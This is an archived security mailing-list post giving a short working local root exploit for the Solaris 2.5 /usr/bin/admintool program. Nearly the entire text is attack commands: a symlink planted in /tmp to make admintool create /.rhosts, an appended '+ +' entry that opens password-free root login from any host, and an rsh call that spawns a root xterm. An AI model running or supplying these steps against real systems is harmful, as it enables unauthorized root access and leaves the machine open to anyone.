Resent-From: best-of-security@suburbia.net
X-Mailing-List: <best-of-security@suburbia.net> archive/latest/177
X-Loop: best-of-security@suburbia.net
Precedence: list
Resent-Sender: best-of-security-request@suburbia.net
Subject: BoS: Solaris 2.5 Exploit (/usr/bin/admintool)

I found that /usr/bin/admintool was easier.

setenv DISPLAY yourdisplay:0.0
ln -s /.rhosts /tmp/.group.lock
/usr/bin/admintool
(browse -> group -> edit a group -> get an error message -> exit)
echo "+ +" >> .rhosts
/usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"